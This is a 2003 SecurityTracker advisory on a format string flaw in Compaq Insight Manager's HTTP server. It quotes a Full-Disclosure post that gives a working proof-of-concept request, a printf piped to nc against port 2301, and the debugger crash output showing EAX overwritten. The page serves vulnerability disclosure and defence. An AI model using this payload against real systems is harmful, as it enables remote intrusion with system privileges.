SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   HPE Systems Insight Manager Vendors:   HPE
Compaq Insight Manager Format String Flaw May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1007390
SecurityTracker URL:  http://securitytracker.com/id/1007390
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 4 2003
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 5.00 H
Description:   A vulnerability was reported in HP/Compaq Insight Manager. A remote user may be able to execute arbitrary code.

It is reported that there is a format string flaw in the processing of DebugSearchPaths HTTP requests. According to the report, the EAX register can be overwritten. It may be possible for a remote user to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].

A demonstration exploit command is provided:

$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Impact:   A remote user may be able to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] formatstring bug in Compaq HTTP Servers


Hi there

There is a formatstring bug in Compaq HTTP Servers.
[in <!.DebugSearchPaths>?Url=> requests]

The HTTP server runs with LocalSystem account.

Versions:
All versions i have tested had this formatstring bug.

To be shure that it wasn't allready fixed, i downloaded this new version..
Insight Management Agent  
Version: 5.00 H (01/17/2003) 
http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&SoftwareVer=17022

Request:
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print
 ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Result:
0:005> g
(9a8.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800
eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
MSVCRT!setvbuf+65d:
780127a8 8908             mov     [eax],ecx         ds:0023:42424242=????????
*** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Compaq
\COMPAQ~1\CPQWEB~1\CpqHMMO.dll - 

Have a nice day
/bashis
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC